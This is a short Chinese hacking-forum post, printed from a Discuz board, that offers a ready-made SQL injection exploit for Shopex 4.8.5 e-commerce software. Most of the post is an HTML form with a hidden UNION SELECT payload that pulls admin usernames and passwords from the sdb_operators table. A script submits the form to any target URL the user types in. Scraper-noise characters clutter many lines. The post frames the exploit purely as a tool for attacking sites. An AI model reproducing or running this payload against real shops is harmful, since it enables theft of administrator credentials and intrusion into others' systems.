中国网络渗透测试联盟

标题: Shopex 4.8.5 SQL Injection Exp 0day [打印本页]
作者: admin    时间: 2013-1-23 09:20
标题: Shopex 4.8.5 SQL Injection Exp 0day
<center>
; O! D$ a) D" s) n2 e5 I0 |<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
' o- F; A+ k: u# i: r<form action="" method="post" name="submit_url">* b' m3 i* x- J" `
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
: S; U& j1 H" I# m. D7 X$ G<input type="hidden" name="goods[goods_id]" value="3">1 o+ }" u7 Z9 ^# Z  ?+ H2 L: n* {0 {
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">8 ]# o/ ~( L7 |5 d+ s$ N3 A
<input type="submit" value="给我注入"  onclick=fsubmit()>
. K, |% G# m1 D$ Y3 B</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com, M' s) A0 }. v

1 x" X5 W- l* ~8 b<script>
6 h6 f" T& p6 G5 Ofunction fsubmit(){ % A9 Y, m; T  y% n* B8 {
form = document.forms[0];
; @1 n3 i& Z" g9 Rform.action = form.url.value+'/?product-gnotify';
& ~, c! s' a& W. Y. l1 a; dform.submit(); 5 y6 p7 l* y$ s, j7 [, B
} ; s% G# J- P+ M( ]  l
</script>
8 T0 _5 q, \( D4 w. y+ V  W  Y



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2